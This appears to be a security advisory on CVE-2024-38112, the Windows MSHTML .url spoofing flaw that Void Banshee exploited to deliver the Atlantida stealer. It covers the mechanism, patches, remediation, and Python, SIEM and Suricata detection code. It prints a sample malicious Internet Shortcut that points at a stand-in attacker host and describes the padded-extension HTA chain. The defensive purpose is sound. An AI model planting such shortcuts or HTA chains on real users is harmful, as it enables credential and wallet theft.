CVE-2024-38112 High Patch Available

CVE-2024-38112: Windows MSHTML Platform Spoofing Vulnerability

CVE Details

CVE ID CVE-2024-38112
CVSS Score 7.5
Severity High
Vendor Microsoft
Product Windows MSHTML Platform
Patch Status Available
Published July 9, 2024
EPSS Score 93.0%
CISA Patch Deadline ⚠ July 30, 2024 Federal deadline passed

Background

Internet Explorer has been “retired”: Microsoft ended support for the IE11 desktop application on June 15, 2022, and a February 2023 Edge update disabled it permanently on most Windows 10 editions, redirecting users to Edge. But the MSHTML rendering engine it is built on (also called Trident) remains a Windows component, used by Edge’s IE mode and by legacy applications that embed it. That is the problem.

CVE-2024-38112 is a spoofing bug with an outsized payoff: a crafted Internet Shortcut (.url) file that, when opened, silently launches Internet Explorer instead of the user’s default browser and points it at an attacker-controlled page. IE’s security model predates the sandboxing, script restrictions and download handling of modern browsers, so from there the attacker can social-engineer the user into running content (such as an HTA file) that Edge or Chrome would refuse to execute at all.

This was exploited as a zero-day before the July 2024 patch by a threat group that Trend Micro tracks as Void Banshee. It shows that “retired” software can still bite you if it is present on the system and reachable through a registered protocol handler.

Technical Mechanism

A Windows Internet Shortcut (.url) file is a small INI-style text file whose URL= entry is handed to the protocol handler registered for its scheme. The mhtml: scheme (MIME HTML, an IE-era format that bundles a page and its resources into one file) is handled by the MSHTML/Internet Explorer stack, so a .url file whose target starts with mhtml: is opened by Internet Explorer regardless of the default-browser setting. The in-the-wild samples appended a !x-usc: part selector pointing at the same attacker URL to make IE follow the embedded link.

A malicious .url file might look like:

[InternetShortcut]
URL=mhtml:https://attacker.com/payload!https://attacker.com/payload.mhtml

When this file is opened:

  1. The shell resolves the mhtml: scheme to its registered handler, which is implemented by the Internet Explorer components
  2. That handler launches iexplore.exe / MSHTML to process the document, bypassing the default-browser setting
  3. IE opens the attacker’s page under the legacy IE security model
  4. The attacker’s page can use deprecated technologies (HTA files run by mshta.exe, VBScript, legacy ActiveX controls) that modern browsers do not support at all

Void Banshee chained this with an HTA file disguised as a PDF (the file name ended in ".pdf" followed by a long run of spaces and then ".hta", so the real extension was pushed out of view). IE prompted the user to open the “PDF”, mshta.exe ran the HTA’s VBScript, and that script downloaded and executed the Atlantida stealer. The chain sidesteps controls that assume IE is never running.
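The .url parsing described above, as an added example that is not from the original advisory or from the Void Banshee samples themselves: a small Python inspector that parses an Internet Shortcut file, extracts the URL= target, and flags the mhtml: scheme and the !x-usc: part selector so a mail gateway or triage script can quarantine such attachments. The two sample files, the example.invalid hostnames and the reason strings are constructed for illustration.

```python
"""Inspect Windows Internet Shortcut (.url) files for the mhtml: trick used in CVE-2024-38112."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# An mhtml: URL has the shape "mhtml:<root-url>!<part-url>"; the in-the-wild
# samples used "!x-usc:<url>" as the part selector.
MHTML_RE = re.compile(r"^mhtml:(?P<root>[^!]*)(?:!(?P<part>.*))?$", re.IGNORECASE | re.DOTALL)


@dataclass
class UrlFileReport:
    url: str | None
    scheme: str | None
    suspicious: bool
    reasons: list[str] = field(default_factory=list)
    embedded_urls: list[str] = field(default_factory=list)


def parse_url_file(data: bytes) -> dict[str, str]:
    """Return the key/value pairs of the [InternetShortcut] section.

    Keys are case-insensitive; CRLF or LF line endings and a UTF-8 BOM are tolerated.
    """
    text = data.decode("utf-8-sig", errors="replace")  # utf-8-sig strips a BOM if present
    section = None
    keys: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            keys[key.strip().lower()] = value.strip()
    return keys


def inspect_url_file(data: bytes) -> UrlFileReport:
    """Flag shortcuts whose target would be handed to the MSHTML/IE protocol handler."""
    keys = parse_url_file(data)
    url = keys.get("url")
    if url is None:
        return UrlFileReport(None, None, False, ["no URL= entry in [InternetShortcut]"])
    scheme = url.split(":", 1)[0].lower() if ":" in url else None
    reasons: list[str] = []
    embedded: list[str] = []
    match = MHTML_RE.match(url)
    if match:
        reasons.append("mhtml: scheme forces MSHTML/Internet Explorer regardless of default browser")
        root, part = match.group("root"), match.group("part")
        if root:
            embedded.append(root)
        if part is not None:
            if part.lower().startswith("x-usc:"):
                reasons.append("'!x-usc:' part selector as used in the Void Banshee samples")
                part = part[len("x-usc:"):]
            if part:
                embedded.append(part)
    return UrlFileReport(url, scheme, bool(reasons), reasons, embedded)


# Constructed samples (not real captures): an ordinary shortcut and one using the mhtml: trick.
BENIGN_URL_FILE = b"[InternetShortcut]\r\nURL=https://learn.microsoft.com/\r\n"
MALICIOUS_URL_FILE = (
    b"\xef\xbb\xbf[InternetShortcut]\r\n"
    b"URL=mhtml:http://example.invalid/te/test1.html!x-usc:http://example.invalid/te/test1.html\r\n"
    b"ShowCommand=7\r\nIconIndex=13\r\n"
)

if __name__ == "__main__":
    for name, blob in (("benign.url", BENIGN_URL_FILE), ("invoice.url", MALICIOUS_URL_FILE)):
        report = inspect_url_file(blob)
        verdict = "QUARANTINE" if report.suspicious else "allow"
        print(f"{name}: {verdict} scheme={report.scheme}")
        for reason in report.reasons:
            print(f"  - {reason}")
        for target in report.embedded_urls:
            print(f"  fetches: {target}")
```

The inspector keys on the scheme rather than on a hostname list because the handler choice, not the destination, is what makes the file dangerous; the extracted embedded URLs are what you would pass to URL reputation or sandbox detonation.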

Real-World Exploitation Evidence

Trend Micro (via its Zero Day Initiative) identified Void Banshee exploiting this zero-day in 2024:

  • Void Banshee — a threat actor targeting organisations in North America, Europe, and Southeast Asia, primarily motivated by data theft and credential harvesting
  • Atlantida Stealer — an information stealer deployed through this vulnerability chain, targeting credentials, browser data, and cryptocurrency wallets
  • HTA delivery — malicious HTML Application files served via the MSHTML handler, using VBScript to download and execute payloads
  • Phishing delivery — malicious .url files delivered via phishing emails or embedded in archives

The group targeted sectors including education, government, and healthcare.

Impact Assessment

  • Credential theft — Atlantida Stealer harvests browser passwords, cookies, cryptocurrency wallet data
  • Code execution via the retired IE path — the victim ends up in a browser without the sandboxing and download protections of Edge or Chrome, and the HTA that follows runs under mshta.exe with the user’s full privileges
  • Bypasses URL file defences — many organisations allow .url files since they’re commonly used for legitimate web shortcuts
  • Multi-stage payload capability — the IE/MSHTML execution context enables VBScript and HTA execution that modern browsers would block
  • User trust exploitation — users who think they’re opening a harmless link are actually running malicious HTA code

Affected Versions

Product                        | Affected versions              | Fixed version (July 9, 2024 update)
Windows 10 (21H2, 22H2)        | Before the July 2024 updates   | KB5040427
Windows 11 (21H2)              | Before the July 2024 updates   | KB5040431
Windows 11 (22H2, 23H2)        | Before the July 2024 updates   | KB5040442
Windows Server 2016            | Before the July 2024 updates   | KB5040434
Windows Server 2019            | Before the July 2024 updates   | KB5040430
Windows Server 2022            | Before the July 2024 updates   | KB5040437

Remediation Steps

  1. Apply the July 2024 Patch Tuesday updates (KB numbers above). This is the fix; the steps below are defence in depth
  2. Optionally remove the mhtml: protocol registration so the shell has nothing to hand an mhtml: target to. This is not a Microsoft-supplied mitigation, so export the key first so the change can be reversed, and test, because anything that still depends on the handler will break:
    reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MHTML" mhtml-backup.reg
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MHTML" /f
  3. Block or quarantine .url file attachments (including inside archives) at the email gateway; they have minimal legitimate business use and are frequently abused
  4. Block mshta.exe with AppLocker or Windows Defender Application Control (WDAC). Both are default-deny once a rule collection is enforced, so a deny rule must be merged into a policy that already contains allow rules; roll out in audit mode first:
    # AppLocker: in the Executable Rules collection, add Deny path rules for %SYSTEM32%\mshta.exe and %WINDIR%\SysWOW64\mshta.exe
    # WDAC: add a Deny rule for mshta.exe, or adopt Microsoft's recommended block rules, which already list it
  5. If IE/MSHTML is needed by legacy applications, confine those applications via AppLocker or virtualisation rather than leaving standalone IE reachable for every user
  6. Hunt for Atlantida Stealer indicators on endpoints; because the stealer targets browser credentials, cookies and wallet data, reset credentials and revoke sessions for any affected user

Detection Guidance

Endpoint monitoring — look for:

  • mshta.exe whose parent is iexplore.exe: this is the CVE-2024-38112 chain itself and should not occur in a healthy estate
  • mshta.exe execution from other unexpected parent processes (Office applications, browsers, script hosts)
  • .hta files written to or executed from user-writable locations such as %TEMP% and Downloads, especially with a padded or double extension (".pdf      .hta")
  • iexplore.exe process creation at all (rare since IE retirement)

SIEM rule (pseudo-query; adapt field names to your schema):

(process_name = "mshta.exe" AND parent_name = "iexplore.exe")
OR (process_name IN ("iexplore.exe", "mshta.exe") AND NOT parent_name IN known_parent_list)

The first clause is high fidelity on its own; the second needs a short, reviewed allowlist of legacy applications that legitimately spawn IE or mshta.exe. A date filter adds nothing here, since IE’s retirement is not a property of the event.

Any iexplore.exe launching in a modern Windows environment (post-IE retirement) should be treated as suspicious.
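The process-telemetry logic above, as an added example that is not part of the original page: a Python triage function run over constructed Sysmon-style process-creation events. It ranks mshta.exe spawned by iexplore.exe highest, then mshta.exe or iexplore.exe from any parent outside an allowlist. The allowlisted parent (legacyportal.exe), the timestamps and the file paths are assumptions for illustration, not real telemetry.

```python
"""Triage process-creation telemetry for the CVE-2024-38112 chain (.url -> iexplore.exe -> mshta.exe)."""
from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    ts: str            # ISO-8601 timestamp from the EDR/Sysmon event
    image: str         # full path of the new process
    parent_image: str  # full path of the parent process
    cmdline: str       # command line of the new process


# Hypothetical allowlist for an estate with one legacy app that still drives IE and HTAs.
# Keep this short and reviewed; every entry is a blind spot.
IEXPLORE_KNOWN_PARENTS = {"legacyportal.exe"}
MSHTA_KNOWN_PARENTS = {"legacyportal.exe"}


def image_name(path: str) -> str:
    """Normalise 'C:\\Windows\\SysWOW64\\mshta.exe' (any case, either slash) to 'mshta.exe'."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(ev: ProcEvent) -> tuple[str, str] | None:
    """Return (severity, reason) for an interesting event, or None."""
    img, parent = image_name(ev.image), image_name(ev.parent_image)
    if img == "mshta.exe":
        if parent == "iexplore.exe":
            return ("high", "mshta.exe spawned by Internet Explorer: HTA opened via MSHTML (CVE-2024-38112 chain)")
        if parent not in MSHTA_KNOWN_PARENTS:
            what = ".hta file" if ".hta" in ev.cmdline.lower() else "inline script"
            return ("medium", f"mshta.exe running {what} from unexpected parent {parent}")
    if img == "iexplore.exe" and parent not in IEXPLORE_KNOWN_PARENTS:
        return ("medium", f"iexplore.exe launched by {parent}; IE is retired and this should be rare")
    return None


def detect(events: list[ProcEvent]) -> list[tuple[str, str, str]]:
    """Run triage over a batch of events; returns (timestamp, severity, reason) tuples."""
    alerts: list[tuple[str, str, str]] = []
    for ev in events:
        hit = triage(ev)
        if hit:
            alerts.append((ev.ts, hit[0], hit[1]))
    return alerts


# Constructed sample batch (not real telemetry): a user opens a malicious .url, IE starts,
# IE hands the disguised HTA to mshta.exe; plus benign and allowlisted noise and a Word macro.
SAMPLE_EVENTS = [
    ProcEvent("2024-07-01T09:12:03Z", r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe", "explorer.exe"),
    ProcEvent("2024-07-01T09:12:41Z", r"C:\Program Files\Internet Explorer\iexplore.exe", r"C:\Windows\explorer.exe",
              r'"C:\Program Files\Internet Explorer\iexplore.exe"'),
    ProcEvent("2024-07-01T09:12:58Z", r"C:\Windows\SysWOW64\mshta.exe", r"C:\Program Files\Internet Explorer\iexplore.exe",
              r'"C:\Windows\SysWOW64\mshta.exe" "C:\Users\alice\AppData\Local\Temp\Invoice.pdf               .hta"'),
    ProcEvent("2024-07-01T09:15:00Z", r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", r"C:\Windows\explorer.exe", "msedge.exe"),
    ProcEvent("2024-07-01T10:02:17Z", r"C:\Windows\System32\mshta.exe", r"C:\LegacyPortal\legacyportal.exe", r"mshta.exe C:\LegacyPortal\ui.hta"),
    ProcEvent("2024-07-01T11:30:05Z", r"C:\Windows\System32\mshta.exe", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              'mshta.exe vbscript:Execute("...")'),
]

if __name__ == "__main__":
    for ts, severity, reason in detect(SAMPLE_EVENTS):
        print(f"{ts} [{severity.upper():6}] {reason}")
```

Matching on the normalised image name rather than the full path matters because mshta.exe exists in both System32 and SysWOW64, and the 32-bit IE process launches the SysWOW64 copy.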

Email security — alert on .url attachments and quarantine for review.

Suricata signature (local SID range; matches a .url file with an mhtml: target being downloaded over HTTP, which only fires on cleartext or TLS-decrypted traffic):

alert http any any -> any any (msg:"LOCAL CVE-2024-38112 Internet Shortcut with mhtml: scheme downloaded"; flow:established,from_server; file.data; content:"[InternetShortcut]"; nocase; content:"URL=mhtml:"; nocase; distance:0; classtype:web-application-attack; sid:1000001; rev:2;)

The HTA itself arrives in a later response after IE has started, so a rule that expects "mhtml:" and ".hta" in the same body would miss the chain; alert on the shortcut, then let endpoint telemetry catch the mshta.exe stage.

Timeline

Date                 | Event
January 2023 onward  | Earliest known malicious .url samples using the mhtml: trick, found in retrospective hunting by Check Point Research
Early to mid 2024    | Void Banshee campaigns deliver Atlantida Stealer through the .url / IE / HTA chain
May 2024             | Check Point Research and Trend Micro (ZDI) independently report the in-the-wild exploitation to Microsoft
9 July 2024          | Microsoft patches CVE-2024-38112 in the July Patch Tuesday release; Check Point publishes its analysis
9 July 2024          | CISA adds CVE-2024-38112 to the Known Exploited Vulnerabilities catalogue with a 30 July 2024 federal deadline
15 July 2024         | Trend Micro publishes its technical analysis of the Void Banshee campaigns